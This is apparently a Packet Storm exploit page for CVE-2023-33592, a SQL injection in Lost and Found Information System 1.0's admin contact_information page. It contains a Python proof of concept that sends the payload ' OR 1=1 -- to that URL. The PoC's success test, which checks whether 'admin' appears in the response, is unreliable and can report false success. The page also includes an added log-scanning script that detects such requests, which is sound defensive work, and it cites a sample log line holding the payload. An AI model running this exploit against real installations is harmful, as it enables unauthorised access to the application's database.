Lost And Found Information System 1.0 SQL Injection

Lost and Found Information System version 1.0 suffers from a remote SQL injection vulnerability.

Packet Storm
# Exploit Title: Lost and Found Information System v1.0 - SQL Injection
# Date: 2023-06-30
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /php-lfis/admin/?page=system_info/contact_information
# Tested on: Windows/Linux
# CVE : CVE-2023-33592

import requests

# URL of the vulnerable component
url = "http://example.com/php-lfis/admin/?page=system_info/contact_information"

# Injecting a SQL query to exploit the vulnerability
payload = "' OR 1=1 -- "

# Send the request with the injected payload
response = requests.get(url + payload)

# Check if the SQL injection was successful
if "admin" in response.text:
    print("SQL injection successful!")
else:
    print("SQL injection failed.")
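
A defender-side check for the request pattern shown above, added here as an example and not part of the original advisory or the application's code: it scans web access log lines for requests to /php-lfis/admin/ whose decoded `page` parameter contains anything other than path-like characters. The combined log format, the allowlist pattern, the helper names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: Apache/Nginx combined log format; only the quoted request line is used.
REQUEST_RE = re.compile(r'"[A-Z]+ (.+?) HTTP/[\d.]+"')
# Component path named in the advisory.
ADMIN_PATH = "/php-lfis/admin/"
# Assumption: legitimate page values look like "system_info/contact_information".
SAFE_PAGE = re.compile(r"[A-Za-z0-9_/]+")

# Constructed sample log lines (not taken from a real system).
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Jun/2023:10:01:02 +0000] '
    '"GET /php-lfis/admin/?page=system_info/contact_information HTTP/1.1" 200 5120',
    '203.0.113.9 - - [30/Jun/2023:10:01:09 +0000] '
    '"GET /php-lfis/admin/?page=system_info/contact_information\'%20OR%201=1%20--%20 '
    'HTTP/1.1" 200 5480',
    '203.0.113.7 - - [30/Jun/2023:10:02:15 +0000] '
    '"GET /php-lfis/index.php HTTP/1.1" 200 2048',
]


def suspicious_requests(log_lines):
    """Return (line_number, decoded page value) for each flagged request."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parseable request line
        target = urlsplit(match.group(1))
        if not target.path.startswith(ADMIN_PATH):
            continue  # outside the affected component
        # parse_qs percent-decodes values, so encoded quotes and spaces are seen.
        for value in parse_qs(target.query).get("page", []):
            if not SAFE_PAGE.fullmatch(value):
                hits.append((number, value))
    return hits


if __name__ == "__main__":
    for number, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: unexpected page parameter {value!r}")
```

A hit only shows that a request carried unexpected characters in `page`; whether the query reached the database still has to be confirmed from application or database logs.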

Related news

CVE-2023-33592: CVE/CVE-2023-33592 at main · DARSHANAGUPTA10/CVE

Lost and Found Information System v1.0 was discovered to contain a SQL injection vulnerability via the component /php-lfis/admin/?page=system_info/contact_information.
